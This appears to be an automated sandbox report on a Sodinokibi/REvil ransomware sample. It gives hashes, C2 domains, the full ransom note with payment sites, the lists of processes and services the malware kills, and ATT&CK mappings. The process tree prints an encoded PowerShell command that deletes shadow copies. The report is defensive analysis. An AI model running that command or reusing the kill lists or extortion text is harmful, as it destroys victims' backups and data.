Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:01

General

  • Target

    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

  • Size

    204KB

  • MD5

    12d2c87f6184659aeba6189dd828e062

  • SHA1

    0b1f505a6458053f5e18fc8677b748985f669926

  • SHA256

    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862

  • SHA512

    9472e0fe4ecc4afad8aa33f86fbbc0aa53003d880d12921bb0b9156d77758474fb6ccb25d175b750162abe1ebc3ea18e33f6d3898fc927afef0979c64274e4e6

Malware Config

Extracted

Path

C:\50q9sehak-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 50q9sehak. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A4B0054042AC10B0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/A4B0054042AC10B0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WHJmbh53JqNjAojaZKLW+tBUeSw9kvpLifz2FO6yv7lhbaPVGfmHb9+0/keNFN2l NkoqSOHBTBQjU/NsgqBhoN6W6MQHiryFrj8aTXP0DeliYQLF7jGICfcd8AssdfLu PybzOXhFc/7fqRALaLuvqxj3cv30lVX3I7g+te5IBIcpg5qkEehAWPWRnEaKJSz9 /kKaS3nXOvM32TbmMv6TP5wK+oCltRQ8FHgqd8gBKywHEzmVCokOVx0oyexE8kBo xcK8w1IrWEO5oZfv2P+zdk5y6NLWixM+REjdJ1nshrDyXbAl5RWbhRDskvQ6gWhS SfAVzGoDeArXREQ6jSueeciE5cNdXBpqjn3MR6xMWJIYZLtRS6uL+Fzghwj0EZkR SeTR8EG5C/P2WIRKnJqPuIBMeD017Wp2Lvkv/6j2hnwC+jck1y/3edod8pBDjGG3 7SZhUFtIHrJlTsmo0hJny5mpTvK2Q10sFFtHj/v1hPdO1I3mnhO36K8vI9exjuAF qBlU18Sfjre4FQ+Ly5J0GtnC+j82be0Deq4coGy5MlyO8fLljEJKeQERnMuZCM6J 5RddGd/t9WHOKY98/nlroDs/Nq2A8sscleifbfTMYTNTLoraAj+BhYmZ+Ukft7iZ UA7x18TNewPlcRvtNsXRrjmp8VUxl8aqtBXmJAYimAt+MAD36+NElRxvXbVS9mbP 6FyMsacO/2GhccT2OM1A+UPdX1SygZpKFVtTImOC53rbDmc9Joni+brhPdb927eC mOsgArX2N03XghYZS1GdRJrfBp+YojllYC++0RyPzrfKShUEcfx+dIIGmLDEJkuF sUpUcUgqmTQ9iTZA5bjoHSQwwvzat5cfMFqvTAsncJBA+LQ+695oXIFHCAurSWgr m1rTycu+iiCzPTGzjaFo8AiW+B3b5d0437bt7YCT+ScngWg/lSB0iyOX0rn0v2Oo /PMSXchLlUg5FDD4Be66IjtkbB2xdAD0gk0gsQu60exIdYns45Uoc7wYanPBI9Rq oOo40AOmWdM3JHUfIVEIlX1qUvl3/EQHenhnievFQk+0f7hWjDFGsgyphPR/5e9F NodJCnv63GQreACvwBzA3t2ogp4mZNZuwgtPkXYuwPjS75dvGfpJvranKRBpOg== Extension name: 50q9sehak ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A4B0054042AC10B0

http://decryptor.top/A4B0054042AC10B0

Extracted

Family

sodinokibi

Botnet

19

Campaign

99

C2

hekecrm.com

jax-interim-and-projectmanagement.com

donau-guides.eu

ideamode.com

valiant-voice.com

thehovecounsellingpractice.co.uk

sochi-okna23.ru

frimec-international.es

osn.ro

pinkxgayvideoawards.com

banksrl.co.za

startuplive.org

asiaartgallery.jp

11.in.ua

campusescalade.com

pubcon.com

mahikuchen.com

georgemuncey.com

azerbaycanas.com

wademurray.com

Attributes
  • net

    true

  • pid

    19

  • prc

    firefoxconfig

    infopath

    steam

    sqbcoreservice

    mysqld_nt

    oracle

    mydesktopqos

    msftesql

    sqlbrowser

    thebat

    isqlplussvc

    ocssd

    sqlwriter

    sqlagent

    thunderbird

    mysqld_opt

    winword

    wordpad

    thebat64

    visio

    dbsnmp

    msaccess

    mydesktopservice

    ocautoupds

    ocomm

    encsvc

    excel

    agntsvc

    mysqld

    synctime

    tbirdconfig

    outlook

    mspub

    onenote

    xfssvccon

    dbeng50

    powerpnt

    sqlservr

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    99

  • svc

    veeam

    vss

    memtas

    sophos

    svc$

    mepocs

    backup

    sql

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    "C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
    1⤵
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:696
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:924
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1524

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
      MD5

      777589bebd9755259639db210e619e50

      SHA1

      b48e42718b55e072ab5e0c81855cacf13a593bb7

      SHA256

      585a0bdb8575d5f7426840d71b9c6081e37fcbdbc04135cc15749e30268572ab

      SHA512

      2f9b0942e41552c6964d1b69cb2bd2b3aa1a9a0ee55aaa2d11a6044f96a01f6d3cb6a559763a865ca4be1bc78011595d5081f637f005f6b8954f16effab0b82f

    • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
      MD5

      777589bebd9755259639db210e619e50

      SHA1

      b48e42718b55e072ab5e0c81855cacf13a593bb7

      SHA256

      585a0bdb8575d5f7426840d71b9c6081e37fcbdbc04135cc15749e30268572ab

      SHA512

      2f9b0942e41552c6964d1b69cb2bd2b3aa1a9a0ee55aaa2d11a6044f96a01f6d3cb6a559763a865ca4be1bc78011595d5081f637f005f6b8954f16effab0b82f

    • memory/696-122-0x000001E0EEB40000-0x000001E0EEB62000-memory.dmp
      Filesize

      136KB

    • memory/696-127-0x000001E0EECF0000-0x000001E0EED66000-memory.dmp
      Filesize

      472KB

    • memory/696-128-0x000001E0ECB60000-0x000001E0ECB62000-memory.dmp
      Filesize

      8KB

    • memory/696-130-0x000001E0ECB63000-0x000001E0ECB65000-memory.dmp
      Filesize

      8KB